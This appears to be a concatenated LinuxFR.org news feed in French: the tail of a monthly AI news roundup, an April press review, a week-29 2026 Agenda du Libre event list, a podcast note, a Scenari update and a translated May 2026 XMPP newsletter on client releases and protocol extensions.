- L’IA “locale” de chrome n’est plus uniquement locale ( lien original, discussion LinuxFR ) ;
- Whoa, I produced this prototype so fast! I have super powers! ( lien original, discussion LinuxFR ) ;
- Séoul teste l’idée d’un « dividende IA » pour redistribuer la rente technologique ( lien original, discussion LinuxFR ) ;
- L’objectif de Fedora pour un « bureau IA pour développeur » // Garçon ? Il y a un llm dans ma distrib ! ( lien original, discussion LinuxFR ) ;
- Entretien avec Abel Quentin, auteur de “Sanctuaires, résister à l’invasion de l’IA générative” (matinale de France Inter) ( lien original, discussion LinuxFR ) ;
- « J’ai postulé pour être pape » : utiliser ChatGPT et perdre contact avec la réalité ( lien original, discussion LinuxFR ) ;
- L’IA générative dépasse les étudiant(e)s… et après ? ( lien original, discussion LinuxFR ) ;
- Le culte du TDD et des LLMs ( lien original, discussion LinuxFR ) ;
- Nvidia accusé d’avoir volontairement conçu des scripts pour pirater des livres ( lien original, discussion LinuxFR ) ;
- Chris Lattner à propos du compilateur créé par Claude ( lien original, discussion LinuxFR ) ;
- Développement de l’IA dans les entreprises: une menace pour l’emploi des femmes ( lien original, discussion LinuxFR ) ;
- Meta Employee Attacks Zuckerberg for Collecting Every Employee Keystroke ( lien original, discussion LinuxFR ) ;
- Sanctuaires, d’Abel Quentin ( lien original, discussion LinuxFR ) ;
- Samsung : 50 000 salariés menacent de faire grève et pourraient bloquer toute l’industrie ( lien original, discussion LinuxFR ) ;
- Where are all the data centers? ( lien original, discussion LinuxFR ) ;
- Britannica pillé par ChatGPT : comment Umberto Eco avait prévu ce vertige ( lien original, discussion LinuxFR ) ;
- Linus Torvalds says AI-powered bug hunters have made Linux security mailing list ‘almost entirely unmanageable’ ( lien original, discussion LinuxFR ) ;
- En guerre cognitive, le camp qui s’explique est le camp qui perd ( lien original, discussion LinuxFR ) ;
- les protestations contre l’IA se multiplient ( lien original, discussion LinuxFR ) ;
- La recherche Google telle qu’on la connaît va disparaître cet été ( lien original, discussion LinuxFR ) ;
- Afin de lutter contre la désinformation, les contenus générés par IA devront être tatoués…sauf s’ils sont vérifiés par un humain ( lien original, discussion LinuxFR ) ;
- Retour à la réalité : Google annonce de nouvelles “limites” sur Gemini : il faut maintenant apprendre à économiser l’IA comme on économise l’électricité ( lien original, discussion LinuxFR ) ;
- Le cauchemar de Lessig. If « Code Is Law », what da fuck is « Vibe Coding » ? ( lien original, discussion LinuxFR ) ;
- « Hors norme » : le gigantesque projet Campus IA relance la lutte contre les data centers ( lien original, discussion LinuxFR ) ;
- Une IA résoud un problème ouvert d’Erdos célèbre, commentaire de matheux ( lien original, discussion LinuxFR ) ;
- SpaceX Files Its S-1: Full Breakdown Of The Largest IPO In American History [Introduction en bourse de SpaceX / xAI / X] ( lien original, discussion LinuxFR ) ;
- WordPress 7.0 “Armstrong” ( lien original, discussion LinuxFR ) ;
- Microsoft reports are exposing AI’s real cost problem: Using the tech is more expensive than paying human employees ( lien original, discussion LinuxFR ) ;
- Reddit /r/programming banni les contenus IA et à propos d’IA ( lien original, discussion LinuxFR ) ;
- En Suède, le fiasco du premier café dirigé par une IA ( lien original, discussion LinuxFR ) ;
- L’IA est en train de tuer les ordiphones bon marché ( lien original, discussion LinuxFR ) ;
- Encyclique sur l’IA : l’analyse de La Croix ( lien original, discussion LinuxFR ) ;
- Encyclique sur l’IA : l’analyse de Le Grand Continent ( lien original, discussion LinuxFR ) ;
- Aux États-Unis, des centaines de collectifs s’opposent aux data centers, et gagnent parfois ( lien original, discussion LinuxFR ) ;
- Linus siffle la fin de la récré sur les patchs générés par lA les yeux fermés. ( lien original, discussion LinuxFR ) ;
- “The open web is on its way out” – Google Changes Its Search Box for the First Time in 25 Years ( lien original, discussion LinuxFR ) ;
- L’ingénieur du pape ( lien original, discussion LinuxFR ) ;
- Le forum de StackOverflow est mort à cause de l’IA, mais l’entreprise éditrice est encore en vie grâce à l’IA ( lien original, discussion LinuxFR ) ;
- En Corée du Sud, des employés de Samsung vont toucher une prime record de 290 000 euros en moyenne ( lien original, discussion LinuxFR ) ;
- Uber commence à trouver l’addition de l’IA un peu salée ( lien original, discussion LinuxFR ) ;
- Flathub interdit désormais les applis codées avec de l’IA ( lien original, discussion LinuxFR ) ;
- I Am Retiring from Tech to Live Offline ( lien original, discussion LinuxFR ) ;
- Dans la Silicon Valley, l’intelligence artificielle prend des airs de divinité ( lien original, discussion LinuxFR ) ;
- AI boom means US is now ‘investing more’ in fossil-fuel power than China ( lien original, discussion LinuxFR ) ;
- Dans la Silicon Valley, l’intelligence artificielle prend des airs de divinité ( lien original, discussion LinuxFR ) ;
- Peut-on connaître le monde uniquement par l’écrit ? ( lien original, discussion LinuxFR ) ;
- IA : SoftBank va investir 75 milliards d’euros dans des infrastructures en France ( lien original, discussion LinuxFR ) ;
- DuckDuckGo Installs Up 30% After Google Announced AI Search ( lien original, discussion LinuxFR ) ;
- Centres de données : pourquoi leur refroidissement consomme autant d’eau (et pourquoi cela pose problème) ( lien original, discussion LinuxFR ) ;
L’illustration a été créée depuis un modèle de framamème12 13 en licence CC014, avec l’assistance de Krita.
En complément, afin de remercier les lectrices et lecteurs qui ont pu prendre connaissance de l’ensemble de la dépêche, nous vous proposons la montée de l’IA (pour « Intelligence Aviaire ») vue par Cepper, une cousine germaine de Pepper15 16 :
-
https://linuxfr.org/news/veille-communautaire-sur-des-intelligences-artificielles-du-mois-d-avril-2026 ↩
-
Le terme « intelligence artificielle » regroupe en fait plusieurs définitions qui n’ont pas toujours fait consensus. Voir la page wikipédia sur leur définition et les techniques associées pour plus de précisions. ↩
-
L’ensemble des « Nouvelles sur l’IA » sont accessibles avec le tag dédié nouvelles_sur_l_ia ↩
-
La dernière dépêche de la série est consultable sur https://linuxfr.org/news/nouvelles-sur-l-ia-de-mars-2026 ↩
-
Le contributeur Moonz< a motivé son arrêt de la série de dépêche par le commentaire https://linuxfr.org/news/nouvelles-sur-l-ia-de-mars-2026#comment-2018598 ↩
-
À la clôture du sondage le 24 mai 2026 à 20h10 CEST, 55.4 % de vote sont favorables à la reprise de la série; 17.6 % de votes défavorables, 7.9 % de votes indécis, et 19.1 % de votes « pas vraiment sérieux ». Pour plus de détails, rendez-vous sur le sondage correspondant ↩
-
Sur les 55.4 % de votes favorables à la reprise de la série, 70.5 % de votes viennent pour la réponse « Oui, même en l’absence de la synthèse des articles » et 29.5 % de votes pour la réponse « Oui, à condition de continuer la synthèse d’une partie des articles ». ↩
-
https://linuxfr.org/news/meilleures-contributions-linuxfr-org-les-primees-de-mai-2026 ↩
-
Le lien de recherche par le tag dédiée est https://linuxfr.org/tags/intelligence_artificielle/public ↩
-
La présente dépêche ne fait pas appel à des grands modèles de langage à cause de l’impopularité de ces outils parmi le public de LinuxFr.org pour la rédaction des articles. Voir le sondage suivant pour se faire une idée : https://linuxfr.org/sondages/faut-il-accepter-les-contenus-generes-par-ia-sur-linuxfr-org ↩
-
Distinguishing Authentic from AI-Generated Explosions using Spatiotemporal Dynamics ↩
-
Un générateur de mème proposé par Framasoft : https://framamemes.org/ ↩
-
Modèle utilisé : They're the same picture ↩
-
Voir cette notice explicative : https://creativecommons.org/publicdomain/zero/1.0/deed.fr ↩
-
Un personnage provenant de la BD en ligne libre Pepper & Carrot ↩
-
Des informations détaillées concernant la BD originelle sont consignées sur Wikipédia ↩
Commentaires : voir le flux Atom ouvrir dans le navigateur
Revue de presse de l’April pour la semaine 28 de l’année 2026
Cette revue de presse sur Internet fait partie du travail de veille mené par l’April dans le cadre de son action de défense et de promotion du logiciel libre. Les positions exposées dans les articles sont celles de leurs auteurs et ne rejoignent pas forcément celles de l’April.
- [Frandroid] Windows passe sous les 60 % de parts de marché sur PC de bureau
- [LCP - Assemblée Nationale] Numérique: le rapport de la commission d'enquête sur les vulnérabilités de la France a été adopté
- [Les Echos] «A un moment, il faut faire un arbitrage de coûts»: ces entreprises qui utilisent déjà des modèles d'IA chinois (€)
- lien nᵒ 1 : April
- lien nᵒ 2 : Revue de presse de l'April
- lien nᵒ 3 : Revue de presse de la semaine précédente
- lien nᵒ 4 :
Agenda du Libre pour la semaine 29 de l'année 2026
Calendrier Web, regroupant des événements liés au Libre (logiciel, salon, atelier, install party, conférence) annoncés par leurs organisateurs. Voici un récapitulatif de la semaine à venir. Le détail de chacun de ces 28 événements (France: 22, Québec:5, Internet: 1) est en seconde partie de dépêche.
- lien nᵒ 1 : April
- lien nᵒ 2 : Agenda du Libre
- lien nᵒ 3 : Carte des événements
- lien nᵒ 4 : Proposer un événement
- lien nᵒ 5 : Annuaire des organisations
- lien nᵒ 6 : Agenda de la semaine précédente
- lien nᵒ 7 : Agenda du Libre Québec
-
- [FR Saint Clar] Tous les Lundis, médiathèque de Saint Clar – Le lundi 13 juillet 2026 de 10h00 à 17h00.
- [FR Saint-Étienne] Permanence de l’association Alolise – Le lundi 13 juillet 2026 de 19h00 à 22h00.
- [FR Montpellier] Permanence | Wikipermanence – Le lundi 13 juillet 2026 de 19h00 à 22h00.
- [FR Sainte-Hélène] Cours gratuits d’Espéranto + Visio – Le lundi 13 juillet 2026 de 19h30 à 21h30.
- [CA-QC Trois-Rivières] 5 à 9 Hybride Linux à Trois-Rivières – Le lundi 13 juillet 2026 de 17h00 à 20h00.
- [FR Dijon] Atelier du mardi – Le mardi 14 juillet 2026 de 15h00 à 19h00.
- [CA-QC Québec] Rencontre hybride, ville de Québec – Le mardi 14 juillet 2026 de 17h00 à 22h00.
- [FR Fourmies] La permanence du libre – Le mercredi 15 juillet 2026 de 13h30 à 17h00.
- [FR Gond-Pontouvre] Permanence du mercredi – Le mercredi 15 juillet 2026 de 14h00 à 18h00.
- [FR Lamastre] Soirée Libre Bidouille – Le mercredi 15 juillet 2026 de 18h00 à 19h00.
- [FR Tours] Rencontre locale OpenStreetMap – Le mercredi 15 juillet 2026 de 18h30 à 20h00.
- [FR Bordeaux] Cours gratuits d’Espéranto – Le mercredi 15 juillet 2026 de 20h00 à 22h00.
- [CA-QC Rimouski] 5 à 8 Hybride Linux à Rimouski – Le mercredi 15 juillet 2026 de 17h00 à 20h00.
- [FR Dinan] Install Party – Donnez une nouvelle vie à votre – Le jeudi 16 juillet 2026 de 14h00 à 17h00.
- [FR Saint-Étienne] Install Party aux Forges – Le jeudi 16 juillet 2026 de 16h30 à 19h30.
- [FR Saint-Jean-en-Royans] Atelier changer d’adresse e-mail – Le jeudi 16 juillet 2026 de 19h00 à 21h00.
- [CA-QC Lévis] 5 à 8 Hybride Linux à Lévis – Le jeudi 16 juillet 2026 de 17h00 à 20h00.
- [FR Brest] Atelier d’été – Café vie privée – Le vendredi 17 juillet 2026 de 14h00 à 17h00.
- [FR Antibes] Rencontre Accès Libre – Le vendredi 17 juillet 2026 de 18h00 à 21h00.
- [Internet] Pause Café Linux : Votre rendez-vous hebdomadaire – Le vendredi 17 juillet 2026 de 11h45 à 13h00.
- [FR Chaumont] Permanence Informatique – Le samedi 18 juillet 2026 de 09h00 à 12h00.
- [FR Saint-Girons] Repair’Café aux ateliers de la liberté – Le samedi 18 juillet 2026 de 11h00 à 15h00.
- [FR Quimperlé] Point info GNU/Linux – Le samedi 18 juillet 2026 de 13h30 à 17h30.
- [FR Nantes] Permanence Linux-Nantes – Le samedi 18 juillet 2026 de 15h00 à 18h00.
- [FR Nîmes] Rencontre | Pique-nique du Libre – Le samedi 18 juillet 2026 de 17h00 à 20h00.
- [CA-QC Vaudreuil-Dorion] Rencontres Linux au Québec – Le samedi 18 juillet 2026 de 11h00 à 14h30.
- [FR Sète] Rencontre | Pique-nique du Libre – Le dimanche 19 juillet 2026 de 17h00 à 20h00.
- [FR Frontignan] Café LINUX : adieu windows, bonjour Linux – Le dimanche 19 juillet 2026 de 18h00 à 20h00.
Tous les lundis de 10h à 17h sans interruption, l’association Prends-toi en main / atelier abcpc, propose install party, suivi, dépannage, formation et revalorisation à petit prix sous Linux exclusivement.
L’atelier abcpc existe depuis plus de 10 ans et milite exclusivement pour les logiciels libres.
- Médiatheque, Médiatheque, 4 place Dastros, Saint Clar, Occitanie, France
- https://www.facebook.com/PrendsToiEnMain
- linux, permanence, dépannage, formation, adieu-windows, libres, logiciels-libres, abcpc, prends-toi-en-main, install-party
Tous les lundis soir de 19h à 22h (hors jours fériés) à la Bricoleuse.
Rencontrer les bénévoles, poser des questions sur le libre ou l’informatique, les logiciels, l’hébergement, passer de Windows à Linux.
Pour passer votre ordinateur sous Linux, nous vous invitons à nous prévenir avant votre passage: contact@alolise.org.
- La Bricoleuse, La Bricoleuse, 27 rue de la Ville, Saint-Étienne, Auvergne-Rhône-Alpes, France
- https://alolise.org
- install-party, aide, logiciel-libre, entraide, alolise, permanence, linux, gnu-linux
Une Wikipermanence est une rencontre physique entre des Wikipédiens chevronnés et de nouveaux ou futurs Wikipédiens qui souhaitent acquérir des connaissances et des conseils sur le fonctionnement de Wikipédia.
Il ne s’agit pas d’une simple rencontre entre Wikipédiens : la Wikipermanence organisée par le groupe local de Montpellier est là pour répondre aux questions, permettre des démonstrations, offrir une aide aux premiers pas et permettre un suivi.
Pour cette soirée, chacun amène ce qu’il veut à manger et à boire pour un repas partagé.
Cette rencontre nous permettra d’aborder les sujets suivants :
Le programme :
- Information sur la communauté Wikipédia ;
- Initiation des débutants ;
- Nous contribuerons sur la mise à jour des différentes pages, sur les Wikipermanences que Montpel’libre organise à Montpellier ;
- Atelier d’écriture ;
- Échanger d’expériences ;
- Proposition d’éditathon ;
- Contributions libres ; *…et tout simplement, passer un moment convivial.
Si vous avez des propositions, n’hésitez pas à compléter la page dédiée sur Wikipédia.
N’hésitez pas à venir: c’est sans inscription, et vous l’aurez deviné, libre et gratuit !
Wikipédia est une encyclopédie libre rédigée collaborativement par des milliers d’internautes. Mais, saviez-vous que vous pouviez y participer ?
En apportant des connaissances, en créant ou améliorant des articles, en prenant des photos, ou simplement en corrigeant des fautes, vous pouvez contribuer à ce grand projet d’encyclopédie collaborative.
Alors, venez participer aux rendez-vous des Wikipermanences de Montpellier qui auront lieu à l’Atelier de Pigistes, le deuxième lundi de chaque mois, de 19h00 à 22h00.
Cet événement vous est proposé dans le cadre du partenariat qui lie le Club de la Presse, Wikimédia France, Wikimedia Foundation, Wikimedia Éducationet Montpel’libre.
Inscription | GPS 43.60302/3.89809
- Atelier des Pigistes, Atelier des Pigistes, 171 bis rue Frimaire, Montpellier, Occitanie, France
- https://cabalherault.fr
- cabalhérault, wikipédia, wikimédia, permanence, wikipermanence, rencontre
Saluton,
Je vous propose des cours d’espéranto gratuits qui débuteront le lundi 8 juin à Sainte-Hélène dans le Médoc et qui sera également disponible en visioconférence.
Le cours est destiné aux apprenants francophones de France et d’ailleurs.
L’espéranto est plus qu’une langue neutre et très facile, mais aussi une langue fraternelle et libre qui permet de voyager dans de nombreux pays avec des facilités d’hébergement ou de fraterniser avec des personnes du monde entier.
Vous trouverez plus d’informations sur la page Wikipédia, le site Espéranto-Gironde ou en visualisant le documentaire "ESPÉRANTO: de la genèse à la conquête de l’Europe"
Les cours ont lieu le lundi soir de 19h30 à 21h30 sur environ 10 soirs pour réaliser les 10 leçons. Ces leçons complèteront les cours papier ou d’application telle que Duolingo.
Début: lundi 8 juin 2026.
Les cours sont GRATUITS pour tous.
Le cours est en présentiel à Sainte-Hélène (33480) au foyer des sociétés en collaboration avec l’association l’Écurieux, ainsi qu’en distanciel / visioconférence.
Ce cours est gratuit pour tous, en présentiel ou en distanciel.
Nous pourrons organiser à la suite du cours, des rencontres avec les espérantistes de Bordeaux, du pays basque… afin de pratiquer en situation réelle.
N’hésitez pas à nous contacter par téléphone au 0688350981 (appel, SMS, Signal) pour plus d’informations ou pour vous inscrire.
Vivu Esperanto kaj Ĝis la revido.
- Foyer des sociétés, Foyer des sociétés, allée du Stade, Sainte-Hélène, Nouvelle-Aquitaine, France
- espéranto, langue-libre, langue, visio
Synergies GULL/Restos du Cœur - « Libre à vous ! » du 30 juin 2026 - Podcasts et références
281ème émission Libre à vous ! de l’April. Podcast et programme :
- sujet principal : synergies GULL/Restos du Cœur : l’expérience dans le Loiret avec Cenabumix, avec Jean Carratala et Pierre Meunier-Sirven
- la chronique La pituite de Luk sur « Problème : climat et calculs »
- la chronique F/H/X de Florence Chabanois sur « Entraînée à discriminer »
Rendez‑vous en direct chaque mardi de 15 h 30 à 17 h sur 93,1 FM en Île‑de‑France. L’émission est diffusée simultanément sur le site Web de la radio Cause Commune.
Vous pouvez laisser un message sur le répondeur de la radio, pour réagir à l’un des sujets de l’émission ou poser une question. Le numéro du répondeur : +33 9 72 51 55 46.
- lien nᵒ 1 : Podcast de l’émission
- lien nᵒ 2 : Les références pour l’émission et les podcasts par sujet
- lien nᵒ 3 : La transcription de l’émission
- lien nᵒ 4 : S’abonner au podcast
- lien nᵒ 5 : S’abonner à la lettre d’actus
- lien nᵒ 6 : Libre à vous !
- lien nᵒ 7 : Radio Cause Commune
Commentaires : voir le flux Atom ouvrir dans le navigateur
Nouveautés de juillet 2026 de la communauté Scenari
Scenari est un ensemble de logiciels open source dédiés à la production collaborative, publication et diffusion de documents multi-support. Vous rédigez une seule fois votre contenu et vous pouvez les générer sous plusieurs formes : site web, PDF, OpenDocument, diaporama, paquet SCORM (Sharable Content Object Reference Model)… Vous ne vous concentrez que sur le contenu et l’outil se charge de créer un rendu professionnel accessible et responsive (qui s’adapte à la taille de l’écran).
À chaque métier/contexte son modèle Scenari :
- Opale pour la formation
- Dokiel pour la documentation
- Optim pour les présentations génériques
- Topaze pour les études de cas
- Parcours pour créer des scénarios de formation
- lien nᵒ 1 : Explication de Scenari
- lien nᵒ 2 : Pour démarrer
- lien nᵒ 3 : Téléchargements
- lien nᵒ 4 : Communauté Scenari
- lien nᵒ 5 : Mastodon
- lien nᵒ 6 : Bluesky
- lien nᵒ 7 : Telegram
- lien nᵒ 8 : LinkedIn
- lien nᵒ 9 : Canal Peertube
Lettre d'information XMPP de mai 2026
N. D. T. — Ceci est une traduction de la lettre d’information publiée régulièrement par l’équipe de communication de la XSF, essayant de conserver les tournures de phrase et l’esprit de l’original. Elle est réalisée et publiée conjointement sur les sites XMPP.org et LinuxFr.org selon une procédure définie.
Bienvenue dans la lettre d'information XMPP, ravi de vous retrouver ! Ce numéro couvre le mois de mai 2026.
La lettre d'information XMPP vous est proposée par l'Équipe de communication de la XSF.
Comme tout autre projet accompli par la XSF, la lettre d'information est le résultat du travail volontaire de ses membres et des personnes y contribuant. Si vous êtes satisfait des services et logiciels que vous utilisez peut-être, n'hésitez pas à dire merci ou aider ces projets.
Vous souhaitez contribuer à l'équipe de communication de la XSF ? Lisez en bas de page.
- Annonces de la XSF
- Évènements XMPP
- Vidéos et conférences XMPP
- Articles XMPP
- Nouvelles des logiciels XMPP
- Extensions et spécifications
- Partagez les nouvelles
- Aidez-nous à créer la lettre d'information
- Licence
La XSF (XMPP Standards Foundation) est ravie d'annoncer le 29ème Sommet XMPP, le tout premier Sommet XMPP à se dérouler entièrement en ligne ! Le Sommet XMPP se tiendra du vendredi 4 septembre au samedi 5 septembre 2026, de 13h00 à 16h00 UTC les deux jours. La XSF invite toute personne intéressée par le développement des technologies XMPP à y participer et à discuter de tout ce qui touche à XMPP à distance !
Évènements XMPPSprint XMPP à Berlin (DE / EN) : ça se déroulera en juin, du vendredi 19 au dimanche 21 juin 2026, dans les bureaux de Wikimedia Deutschland e.V. à Berlin, en Allemagne. Si cet événement vous intéresse, venez nous rejoindre ! Pensez simplement à vous inscrire ici, afin que nous sachions combien de personnes seront présentes pour organiser cela au mieux. Si vous avez des questions ou interrogations, rejoignez-nous sur le salon de discussion : sprints@muc.xmpp.org !
XMPP à FOSSY 2026 : l'édition de cette année de FOSSY, la quatrième conférence Free and Open Source Software Yearly, se tiendra au mois d'août, du jeudi 6 au dimanche 9 août 2026 à l'Université de la Colombie-Britannique, à Vancouver, au Canada. Comme toujours, il y aura une thématique XMPP. L'appel à propositions est clos depuis le 2 juin 2026. Cette année encore, JMP a le plaisir de renouveler son offre annuelle de financement pour les intervenants qui souhaiteraient animer une présentation sur la thématique XMPP.
- Messagerie indépendante (XMPP) sous iOS (Monal), par eversten.net pour la chaîne XMPP Tutorials DE [DE], sous-titres [EN],[ES] disponibles
- Messagerie indépendante (XMPP) sous Android (Snikket), par eversten.net pour la chaîne XMPP Tutorials DE [DE], sous-titres [EN],[ES] disponibles
- Messagerie indépendante (XMPP) sous Android (Conversations), par eversten.net pour la chaîne XMPP Tutorials DE [DE], sous-titres [EN],[ES] disponibles
- Conversations (XMPP) : aperçu des fonctionnalités de la version 2.20.0, par eversten.net pour la chaîne XMPP Tutorials DE [DE]
- EnvsBot XMPP Helper Bot pour le "envs pubnix" - BETA, un bot XMPP modulaire conçu avec Python 3 et slixmpp, développé en pensant à l'environnement "envs pubnix" mais sans s'y limiter, par ~dan pour le blog du site de ~dan sur envs.net. [EN]
- Pra esse passaporte vai ter fila, par isadora pour le blog isaCloud diario-de-bordo. [PT_BR]
- Premier objectif de 2026 atteint ! Et maintenant ?, par Timothée Jaussoin pour le blog de Movim. [EN]
- Quel est votre plus ancien déploiement Openfire ?, par guus pour la communauté Ignite Realtime. [EN]
- ¿Qué es XMPP: mensajería federada sin depender de WhatsApp?, par elenamusk pour le blog Tuiter.Rocks. [ES]
aTalk a publié les versions 5.4.0, 5.5.0 et 6.0.0 de sa messagerie instantanée chiffrée avec appels vidéo et fonctionnalités GPS pour Android. Ces versions apportent de nombreux changements "sous le capot". Veuillez consulter les notes de mise à jour pour tous les détails.
Conversations a publié les versions 2.19.16 et 2.20.0 pour Android. Ces versions apportent une révision importante de l'interface utilisateur, un navigateur de médias amélioré permettant de partager et de supprimer des fichiers média, le stockage des médias en interne par défaut (avec un paramètre pour les enregistrer automatiquement dans la galerie), l'envoi immédiat des enregistrements audio au lieu de les attacher en pièce jointe (plus un paramètre pour rétablir l'ancien comportement), l'option Afficher le code QR qui inclut désormais le paramètre de pré-authentification sur les serveurs avec invitations simplifiées, ainsi qu'une barre de recherche pour accéder plus facilement aux recherches depuis l'écran d'accueil. N'oubliez pas de consulter le journal des modifications pour tous les détails !
Converse.js a publié les versions 13.0.0 et 13.0.1 de son client de chat XMPP open source basé sur le Web, avec divers ajouts, améliorations et corrections de bogues. Ces versions ajoutent la prise en charge des réactions aux messages permettant aux utilisateurs de réagir aux messages avec des emojis, les réponses aux messages à des messages spécifiques, la saisie semi-automatique des fournisseurs XMPP possibles lors de la création d’un nouveau compte, une demi-douzaine de corrections et pas mal de travail en coulisses ! Rendez-vous sur le journal des modifications pour tous les détails !
Monal a publié la version 6.4.21 pour iOS et macOS. Cette version affiche désormais la date et l'heure de la dernière utilisation des clés OMEMO, améliore la précision du partage de position et les horodatages de la dernière activité des contacts, et corrige également plusieurs bugs !
Monocles a publié les versions 2.1.6 et 2.2, 2.2.1 et 2.2.2 de son client de chat pour Android. Ces versions introduisent un grand nombre de nouvelles fonctionnalités, d’améliorations et de corrections de bogues, bien trop nombreuses pour être toutes répertoriées ici. Parmi les nouveautés les plus marquantes, vous trouverez les messages éphémères, le partage de position en temps réel, la création et la restauration améliorées des sauvegardes, l’utilisation par défaut du stockage interne caché, le chiffrement de la base de données locale, l’amélioration du chiffrement et de la fiabilité des sauvegardes, la suppression sécurisée et la récupération après migration, des améliorations de l’interface utilisateur et de l’expérience utilisateur, une galerie multimédia, et bien plus encore ! N’hésitez pas à consulter les liens pour obtenir tous les détails ! Remarque : en raison de certains retards dans les mises à jour du Play Store, ces versions ne sont pour l’instant disponibles que via F-droid.
Poezio a publié la version 0.18 de son client console pour XMPP. Cette nouvelle version apporte principalement des améliorations internes, ainsi que quelques nouvelles fonctionnalités telles que la rétraction des messages côté expéditeur, diverses améliorations du plugin react, notamment un moyen de convertir les codes courts :emoji: en véritables emojis, et une nouvelle façon d’afficher ou de masquer les présences dans les discussions de groupe, ainsi que quelques autres améliorations et corrections. Vous trouverez tous les détails dans le lien vers la note de mise à jour.
Profanity a publié la version 0.18.1 de son client XMPP en ligne de commande. Cette version apporte des corrections de bogues liés à la connexion à une ressource vide, résout des problèmes avec l’éditeur asynchrone, corrige les échecs de migration de la base de données et rétablit les demandes d’accusé de réception des messages lorsque les capacités sont inconnues, entre autres. N’oubliez pas de consulter le journal des modifications pour tous les détails !
MongooseIM a publié MongooseIM 6.7.0 avec plus d'ajouts, de changements et de corrections de bugs que ce que nous pouvons raisonnablement énumérer ici ! Assurez-vous de lire le journal des modifications pour tous les détails !
La communauté Ignite Realtime a le plaisir d'annoncer la sortie d'Openfire 5.0.5. Le journal complet des modifications fournit plus de détails, notamment sur les corrections de bogues et les mises à jour des bibliothèques intégrées, tandis que l'équipe continue de travailler sur la prochaine version 5.1.0, qui apportera de nouvelles fonctionnalités.
Prosody IM a le plaisir d’annoncer la version 13.0.6, une nouvelle version mineure issue de la branche stable. Cette version corrige quelques bogues qui ont été découverts et corrigés depuis la version 13.0.5. La plupart de ces corrections sont mineures, mais certaines sont importantes. N’hésitez pas à consulter le journal des modifications pour plus de détails !
go-sendxmpp, un outil permettant d'envoyer des messages à un contact XMPP ou à un MUC, inspiré de sendxmpp, les versions 0.15.6 et 0.15.8 ont été publiées. Tous les détails sont disponibles dans le journal des modifications.
jabber.el, le client XMPP pour Emacs, versions 0.10.7, 0.10.8, 0.10.9 et 0.10.10 ont été publiées. Tous les détails sont disponibles dans le journal des modifications.
libomemo.js, une implémentation en TypeScript du protocole OMEMO Multi-End Message and Object Encryption pour XMPP, la version 0.0.1 est désormais disponible. Vous pouvez consulter le journal des modifications complet pour plus de détails. Remarque : cette version cible toujours la version 0.3.0 d’OMEMO pour XMPP. La prise en charge de la dernière version d’OMEMO sera ajoutée dans une prochaine version.
mellium.im a publié la version 0.23.0 de xmpp, une bibliothèque XMPP écrite en Go. Vous pouvez consulter le journal des modifications pour plus de détails.
picomemo, une implémentation compacte et portable de la cryptographie requise pour OMEMO (E2EE) de XMPP, version 1.2.0 vient d’être publiée. Consultez les détails dans le journal des modifications.
slidgnal, une application riche en fonctionnalités Signal vers une passerelle de contrôle XMPP, basée sur slidge et signalmeow, la version 0.3.0beta11 est désormais disponible. Vous pouvez consulter le journal des modifications intermédiaires de la version 0.3.0beta10 à la version 0.3.0beta11 pour plus de détails.
slixmpp, la bibliothèque XMPP sous licence MIT pour Python 3.7+, version 1.15.0 a été publiée. Vous pouvez consulter l'annonce officielle de la publication pour plus de détails.
xmpp-ap-bridge, une implémentation légère de Fediverse vers XMPP basée sur des bots clients pour permettre des conversations de type chat entre n’importe quelle application Fediverse et n’importe quel client XMPP depuis vos applications clientes habituelles, versions 0.8.0 et 0.8.1 ont été publiées. Vous pouvez consulter tous les détails sur la page des versions.
La XMPP Standards Foundation développe des extensions à XMPP dans sa série de XEP en plus des RFC XMPP. Des développeuses, développeurs et autres personnes expertes en normes du monde entier collaborent à ces extensions, élaborant de nouvelles spécifications pour les pratiques émergentes et affinant les méthodes existantes. Proposées par n'importe qui, celles qui remportent le plus de succès finissent par être classées comme finales ou actives, selon leur type, tandis que les autres sont soigneusement archivées comme différées. Ce cycle de vie est décrit dans la XEP-0001, qui contient les définitions formelles et canoniques des types, des états et des processus. Vous pouvez en savoir plus sur le processus de normalisation ici. La communication autour des normes et des extensions se fait via la liste de diffusion des normes (archives en ligne).
Extensions proposéesLe processus de développement d'une XEP commence par la rédaction d'une idée et sa soumission à l'éditeur XMPP. Dans un délai de deux semaines, le Conseil décide d'accepter ou non cette proposition en tant que XEP expérimentale.
-
Protection contre la rétrogradation de la liaison de canal TLS
- Cette spécification définit un moyen de sécuriser les procédures d'établissement de connexion SASL et SASL2 SCRAM contre les rétrogradations de la liaison de canal résultant de rétrogradations de la version TLS.
- Pas de nouvelle XEP ce mois-ci.
Si une XEP expérimentale n’est pas mise à jour pendant plus de douze mois, elle sera retirée de la catégorie Expérimentale pour être classée comme Déférée. Si une mise à jour intervient, la XEP sera replacée dans la catégorie Expérimentale.
- Pas de XEP déférée ce mois-ci.
- Version 0.2.0 de XEP-0449 (Autocollants)
- Définir explicitement l'attribut « pack » comme MAY. Ajouter plus de détails sur l'envoi et la réception d'autocollants sans pack d'autocollants. (lmw)
- Version 0.2.0 de XEP-0463 (Gestion des versions des affiliations MUC)
- Utilisation d’un élément enfant dédié de <x/> plutôt que d’attributs avec espace de noms. (lmw)
- Version 0.3.0 de XEP-0503 (Espaces côté serveur)
- Correction du nom du champ du nœud pubsub dans les informations de disco de la salle.
- Préciser comment associer des images (avatar et bannière) à un espace. (nc)
Les derniers appels sont lancés une fois que tout le monde semble satisfait de l'état actuel d'une XEP. Une fois que le Conseil a décidé que la XEP semble prête, l'Éditeur XMPP émet un dernier appel pour recueillir des commentaires. Les commentaires recueillis lors du dernier appel peuvent aider à améliorer la XEP avant de le renvoyer au Conseil pour qu'il passe à l'état Stable.
- Pas de dernier appel de XEP ce mois-ci.
- Pas de XEP passant à stable ce mois.
- Pas de XEP dépréciée ce mois.
- Pas de XEP rejetée ce mois.
Veuillez partager cette nouvelle sur d'autres réseaux :
- Mastodon
- Movim
- Bluesky
- YouTube
- Instance Lemmy (non officielle)
- Reddit (non officiel)
- Page Facebook XMPP (non officielle)
Consultez également notre flux RSS !
Vous recherchez des offres d'emploi ou souhaitez engager un consultant professionnel pour votre projet XMPP ? Consultez notre tableau d'affichage des offres d'emploi XMPP.
Contributions et traductions de la lettre d'informationIl s'agit d'un effort communautaire, et nous tenons à remercier les traductrices et traducteurs pour leur contribution.
Les bénévoles et les nouvelles langues sont les bienvenues !
Les traductions de la lettre d'information XMPP seront publiées ici (avec un certain retard) :
Contributions à la lettre d'information de ce mois-ci : emus, cal0pteryx, Gonzalo Raúl Nemmi, Ludovic Bocquet, XSF iTeam
Contributions à la traduction :
